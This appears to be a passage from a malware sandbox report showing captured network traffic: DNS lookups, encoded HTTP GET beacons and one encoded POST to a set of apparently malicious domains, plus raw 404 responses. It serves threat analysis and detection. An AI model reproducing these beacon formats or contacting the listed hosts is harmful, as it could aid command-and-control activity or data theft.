                    Source: global trafficHTTP traffic detected: GET /0322/?YvA4=xnL8AvI8CJiPEDU&UbRxm=HxR1FeZHXJ7BSqCS3fD8mQxxaJumBZenc9dO7nNnWiW1TdG8ymlkgtRZzCsH8EsCxrgxn7fyxa4U+0BCWK8lvrgV1wD4C6X04kpiBTwqtuBdGQan/Ge0WLc1tZ3QEOC6mw== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.bioland.appConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; HM NOTE 1LTE Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.111 Mobile Safari/537.36
                    Source: global trafficHTTP traffic detected: GET /dlkm/?UbRxm=h4lwGEVwdKAie/3i69ZS5ajdX7DevTN5l7rCLvUsWI5Ax6oJIVJyRtoh5SGHiRwIVgG3mVQ8/tYP0qqkAkm1lhwb/KkDwsT64i8O6GgUd051zcV49WQ+HPRS7BJ45XoE1w==&YvA4=xnL8AvI8CJiPEDU HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.kkpmoneysocial.topConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; HM NOTE 1LTE Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.111 Mobile Safari/537.36
                    Source: global trafficHTTP traffic detected: GET /8uep/?UbRxm=c2pj5XzU4r8mroY+x9nXsVmXiRTTvEExFimN19zxWLYZcfwNZM3Ctl+xWcy7JvpSNCmS4f8+1JlLQGO0Hv+UiSuhGSb748cjOyYKQpOu9XZhhnIssQky4Xxuz1j9m1caEA==&YvA4=xnL8AvI8CJiPEDU HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.futuru.xyzConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; HM NOTE 1LTE Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.111 Mobile Safari/537.36
                    Source: global trafficHTTP traffic detected: GET /bi55/?UbRxm=9VfqSJPbhh1HsXnTkF+U6adH/BnqBZbub0jDgAwJrnxzr9B3JVfn3uPZcB9gesjtADmpDWZfolEsGVNmGAi6MiyGQ6YANno90wBnX2TfwVwXOUx5FI/nfHL1eW4WOSittQ==&YvA4=xnL8AvI8CJiPEDU HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.yhj12.oneConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; HM NOTE 1LTE Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.111 Mobile Safari/537.36
                    Source: global trafficHTTP traffic detected: GET /te2d/?UbRxm=YRrrocWQCJ4z5Wo4Hyii3lnusY6IScX2szwquVJanj4zZRsRM51rBmkRCj7FWFPYdGZcOIeAVFgSZdyx5BBHZnzVg/hu/fGyJb1Cl3lRDP19pEGPrlJr8lwvIP2DjfyM2w==&YvA4=xnL8AvI8CJiPEDU HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.officinadelpasso.shopConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; HM NOTE 1LTE Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.111 Mobile Safari/537.36
                    Source: global trafficHTTP traffic detected: GET /qq1e/?UbRxm=DayBJHTwMg56rcld9n6KWZbVQKFRYd6Y2OVvMB/QfV+VoLW2vz3Ysj2Lu1Mz5EvoA06VXqhN10X9MeLBCKiZ8LZ2VXddbMNCxmaFYlM5w9+CsZ6D34cvk8XDh8Pk/EneAg==&YvA4=xnL8AvI8CJiPEDU HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.sankan-fukushi.infoConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; HM NOTE 1LTE Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.111 Mobile Safari/537.36
                    Source: global trafficHTTP traffic detected: GET /z2jp/?UbRxm=OHC+NpFe2K8jmTlicXvXjJ+QVEgSatfCtasqPMFJtNXA1CIQdaIwTH1aekp09+pbZOA1peX5og6OyDAWYalTXTww0fqX4q90/3pIZSi2lNK2VQoZjt3+Z09NDWePsk/Y+A==&YvA4=xnL8AvI8CJiPEDU HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.zxyck.netConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; HM NOTE 1LTE Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.111 Mobile Safari/537.36
                    Source: global trafficHTTP traffic detected: GET /grhe/?UbRxm=AHRdWC0KZWrjxYC0KXJ/Pc0Ifc3a5dIjcNypL3DdH/M5f69FO55V4y/zfqI4/XMCrlXFD3GasOekPJK0GQB6Xv0fwrTDR9rlUwQmGtKqhkKLqQH5fcp3eHuY6Kvt/u2Y7w==&YvA4=xnL8AvI8CJiPEDU HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.krshop.shopConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; HM NOTE 1LTE Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.111 Mobile Safari/537.36
                    Source: global trafficHTTP traffic detected: GET /5kax/?UbRxm=kHRDn+Od6RtwHubD3E4pw9JaMFUU2DIijxVB6CtFbwBz/SAX/B3t7cttXyp9BuzPrv9CCpl0ygq2nuEhZlB9cUHvF/n6EPGCDxKUJTRdD4WbzDcOj2b0xy5K4x5io8krBQ==&YvA4=xnL8AvI8CJiPEDU HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.samundri.onlineConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; HM NOTE 1LTE Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.111 Mobile Safari/537.36
                    Source: global trafficHTTP traffic detected: GET /ipdr/?UbRxm=aqsMELEoVHYTBvrjaGL2RPOv1CWpxeit3T8CA32c3b1KGgngGePyFU4WnP+JT+CjtUjsMbMtl8M87Wzmg5dknNnagRNh5+9+QvGqF8xbYvDN2Ssh6AjGLaQoW3ut45K01w==&YvA4=xnL8AvI8CJiPEDU HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.supernutra01.onlineConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; HM NOTE 1LTE Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.111 Mobile Safari/537.36
                    Source: global trafficHTTP traffic detected: GET /dmly/?YvA4=xnL8AvI8CJiPEDU&UbRxm=TxJb7MA4bghX/lTZi4FFUnx8X5IvqZr5NBwuw2qLyVi8/oqCfZzrCw4HdVl5+7DfFNR6jxv9e9mG0XYoVmaYbw3qmnHIup/BR6FUCIQOGhPMZ/gsWiB/XFVGgfvbM52XoA== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.callyur.shopConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; HM NOTE 1LTE Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.111 Mobile Safari/537.36
                    Source: global trafficHTTP traffic detected: GET /2qq5/?UbRxm=nJlPXscYNUK/x8n7HNvxQXymHirKKOa5d/gbSo8R0WshpRq0xpi0L/Z346LJbhmS5oNKw9fZ+xJ2aA6R/PeeOGlkwsFyxNt6h/Yl654mufiUH4F6GX917Tf2jY4/Q+imsA==&YvA4=xnL8AvI8CJiPEDU HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.iner-tech.onlineConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; HM NOTE 1LTE Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.111 Mobile Safari/537.36
                    Source: global trafficHTTP traffic detected: GET /3agz/?YvA4=xnL8AvI8CJiPEDU&UbRxm=M9KkYvXJQvTAdDL0N809Af0gFgx9ZbNQHhlIdroNnVkJjfd2I5bhi/bs41o8FjJgMZ4GFKyENsY1nw3d8RcMg+XWHrwZPIIO2wtMzeZ/v8QmuglPj4pAgM6ngctNURE5tA== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.oztalkshw.storeConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; HM NOTE 1LTE Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.111 Mobile Safari/537.36
                    Source: global trafficDNS traffic detected: DNS query: www.bioland.app
                    Source: global trafficDNS traffic detected: DNS query: www.kkpmoneysocial.top
                    Source: global trafficDNS traffic detected: DNS query: www.futuru.xyz
                    Source: global trafficDNS traffic detected: DNS query: www.yhj12.one
                    Source: global trafficDNS traffic detected: DNS query: www.officinadelpasso.shop
                    Source: global trafficDNS traffic detected: DNS query: www.sankan-fukushi.info
                    Source: global trafficDNS traffic detected: DNS query: www.zxyck.net
                    Source: global trafficDNS traffic detected: DNS query: www.krshop.shop
                    Source: global trafficDNS traffic detected: DNS query: www.samundri.online
                    Source: global trafficDNS traffic detected: DNS query: www.supernutra01.online
                    Source: global trafficDNS traffic detected: DNS query: www.callyur.shop
                    Source: global trafficDNS traffic detected: DNS query: www.iner-tech.online
                    Source: global trafficDNS traffic detected: DNS query: www.oztalkshw.store
                    Source: global trafficDNS traffic detected: DNS query: www.fantastica.digital
                    Source: unknownHTTP traffic detected: POST /dlkm/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Accept-Encoding: gzip, deflateHost: www.kkpmoneysocial.topOrigin: http://www.kkpmoneysocial.topContent-Type: application/x-www-form-urlencodedContent-Length: 206Cache-Control: max-age=0Connection: closeReferer: http://www.kkpmoneysocial.top/dlkm/User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; HM NOTE 1LTE Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.111 Mobile Safari/537.36Data Raw: 55 62 52 78 6d 3d 73 36 4e 51 46 30 31 32 43 6f 63 4b 55 75 54 64 6c 4d 42 38 33 4b 2f 71 63 4f 4c 34 67 55 42 5a 33 71 2f 6b 62 38 30 58 51 73 6f 39 38 62 39 38 4c 77 46 71 64 62 55 79 32 44 4c 52 6a 68 45 6a 65 7a 61 79 76 31 63 48 31 71 6f 66 71 35 4b 30 46 58 75 44 70 53 30 49 78 61 67 4d 38 66 53 65 6b 45 67 54 68 52 67 77 46 79 49 36 36 50 42 59 69 58 70 63 44 2b 6c 5a 39 41 64 37 2b 53 31 7a 6e 71 4d 48 6e 62 73 56 6f 56 50 6f 72 62 69 61 2b 63 67 64 36 43 61 46 67 61 47 62 78 65 63 48 72 51 57 6b 4d 66 68 53 54 4c 65 56 4d 55 4a 43 6f 69 7a 64 38 4c 78 58 41 2b 62 65 47 6d 68 75 4a 37 4b 58 45 30 6b 3d Data Ascii: UbRxm=s6NQF012CocKUuTdlMB83K/qcOL4gUBZ3q/kb80XQso98b98LwFqdbUy2DLRjhEjezayv1cH1qofq5K0FXuDpS0IxagM8fSekEgThRgwFyI66PBYiXpcD+lZ9Ad7+S1znqMHnbsVoVPorbia+cgd6CaFgaGbxecHrQWkMfhSTLeVMUJCoizd8LxXA+beGmhuJ7KXE0k=
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 25 Nov 2024 12:55:48 GMTContent-Type: text/htmlContent-Length: 808Connection: closeVary: Accept-EncodingLast-Modified: Thu, 20 Jun 2024 14:25:06 GMTETag: "328-61b5314d78b6f"Accept-Ranges: bytesData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 78 2d 75 61 2d 63 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 69 65 3d 65 64 67 65 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 65 72 72 6f 72 5f 64 6f 63 73 2f 73 74 79 6c 65 73 2e 63 73 73 22 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 61 67 65 22 3e 0a 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 61 69 6e 22 3e 0a 20 20 20 20 3c 68 31 3e 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 2d 63 6f 64 65 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 68 32 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0a 20 20 20 20 3c 70 20 63 6c 61 73 73 3d 22 6c 65 61 64 22 3e 54 68 69 73 20 70 61 67 65 20 65 69 74 68 65 72 20 64 6f 65 73 6e 27 74 20 65 78 69 73 74 2c 20 6f 72 20 69 74 20 6d 6f 76 65 64 20 73 6f 6d 65 77 68 65 72 65 20 65 6c 73 65 2e 3c 2f 70 3e 0a 20 20 20 20 3c 68 72 2f 3e 0a 20 20 20 20 3c 70 3e 54 68 61 74 27 73 20 77 68 61 74 20 79 6f 75 20 63 61 6e 20 64 6f 3c 2f 70 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 68 65 6c 70 2d 61 63 74 69 6f 6e 73 22 3e 0a 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 6a 61 76 61 73 63 72 69 70 74 3a 6c 6f 63 61 74 69 6f 6e 2e 72 65 6c 6f 61 64 28 29 3b 22 3e 52 65 6c 6f 61 64 20 50 61 67 65 3c 2f 61 3e 0a 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 6a 61 76 61 73 63 72 69 70 74 3a 68 69 73 74 6f 72 79 2e 62 61 63 6b 28 29 3b 22 3e 42 61 63 6b 20 74 6f 20 50 72 65 76 69 6f 75 73 20 50 61 67 65 3c 2f 61 3e 0a 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 2f 22 3e 48 6f 6d 65 20 50 61 67 65 3c 2f 61 3e 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta http-equiv="x-ua-compatible" content="ie=edge"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <title>404 Not Found</title> <link rel="stylesheet" href="/error_docs/styles.cs
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 25 Nov 2024 12:56:05 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=na0%2BdNc7Sz9PRExX9CV11b2lVgfDZypMcHE39JDjHs00WMsCXPXh3gy2FBK1ExDxREUVp9D0H%2BK9jhVKqKMMZ28%2BIA%2BB2i6mhWU1NeCUlgu92dO7g7%2Bw6BQeaZhQR9wI0Snv275hc8KK"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e81cbfbdd9432dc-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1830&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=776&delivery_rate=0&cwnd=239&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 61 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 85 de 61 3c 40 88 85 2e 87 6c 44 c1 85 6e 3c 41 ea 8c 4d 20 9d 94 31 82 bd bd 54 2d 88 6b 97 ae 1e bc 9f 8f 87 a1 0c c9 d5 15 06 f6 e4 b0 c4 92 d8 b5 eb 16 8e b9 c0 2e df 84 d0 be 4c b4 cf 4a 5d 61 97 69 9a f5 cc 52 58 1d 86 e6 7b 11 1a 87 f6 1d cf 6c 75 4b 59 fa 28 f7 cf cc 2e 34 bb 3c 59 19 03 1e 46 4f 14 a5 87 92 81 e2 d5 77 89 e1 70 da 6f c1 0b c1 26 68 1e 18 2e 1a 59 28 4d c0 aa 59 61 f4 3d 83 31 7f c4 af 11 0f 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: a7M0a<@.lDn<AM 1T-k.LJ]aiRX{luKY(.4<YFOwpo&h.Y(MYa=1'$0
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 25 Nov 2024 12:56:08 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dqwxji09v79CJXsGDAyIFzRR7%2F6N31VQVfUsOHOtuiNT%2ByDw91RA0GRKOidrsFYT4Nq1DxZUrPZkHAe%2FpCS%2BpJKSD553%2B40k32s8ww49DkLH8nfqAYHgIr%2BfEMwSpsQtV63X78eCplpf"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e81cc0ccbe8c43b-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1488&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=796&delivery_rate=0&cwnd=185&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 61 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 85 de 61 3c 40 88 85 2e 87 6c 44 c1 85 6e 3c 41 ea 8c 4d 20 9d 94 31 82 bd bd 54 2d 88 6b 97 ae 1e bc 9f 8f 87 a1 0c c9 d5 15 06 f6 e4 b0 c4 92 d8 b5 eb 16 8e b9 c0 2e df 84 d0 be 4c b4 cf 4a 5d 61 97 69 9a f5 cc 52 58 1d 86 e6 7b 11 1a 87 f6 1d cf 6c 75 4b 59 fa 28 f7 cf cc 2e 34 bb 3c 59 19 03 1e 46 4f 14 a5 87 92 81 e2 d5 77 89 e1 70 da 6f c1 0b c1 26 68 1e 18 2e 1a 59 28 4d c0 aa 59 61 f4 3d 83 31 7f c4 af 11 0f 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: a7M0a<@.lDn<AM 1T-k.LJ]aiRX{luKY(.4<YFOwpo&h.Y(MYa=1'$0
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 25 Nov 2024 12:56:11 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=onSbGqX3FivBa7fkhoyvrasE1koFyJmnMd7wldbYiBArGcAn7BTbCECDDaJhoF195ishCwaVpSksMH5yMmJ1G2IbD2eAfwPX6ajGx2r%2BPs3hCx1Eg0JgZaWrUXNvieLZ%2F4aDgJJBlpjW"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e81cc1d2f2143e3-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1709&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1813&delivery_rate=0&cwnd=232&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 61 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 85 de 61 3c 40 88 85 2e 87 6c 44 c1 85 6e 3c 41 ea 8c 4d 20 9d 94 31 82 bd bd 54 2d 88 6b 97 ae 1e bc 9f 8f 87 a1 0c c9 d5 15 06 f6 e4 b0 c4 92 d8 b5 eb 16 8e b9 c0 2e df 84 d0 be 4c b4 cf 4a 5d 61 97 69 9a f5 cc 52 58 1d 86 e6 7b 11 1a 87 f6 1d cf 6c 75 4b 59 fa 28 f7 cf cc 2e 34 bb 3c 59 19 03 1e 46 4f 14 a5 87 92 81 e2 d5 77 89 e1 70 da 6f c1 0b c1 26 68 1e 18 2e 1a 59 28 4d c0 aa 59 61 f4 3d 83 31 7f c4 af 11 0f 27 a7 bf a8 24 02 00 00 0d 0a Data Ascii: a7M0a<@.lDn<AM 1T-k.LJ]aiRX{luKY(.4<YFOwpo&h.Y(MYa=1'$
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 25 Nov 2024 12:56:13 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JGIQVYX6BGrB5WQUwYt2ob%2BmWuMLsKO5XNlcQm%2FhMq4tlAzAMMPB9J1vQZXDTgoFuw8i%2FuFlrGCyWHJiHPTNY6JCBJeYOu3vD%2FH9TYuHvq%2BTzoRnPqlt1P1WmDs3eUh5Tt5zMMJ2uKb6"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e81cc2e0edc0f4b-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1694&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=516&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 32 32 34 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d Data Ascii: 224<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 25 Nov 2024 12:56:20 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
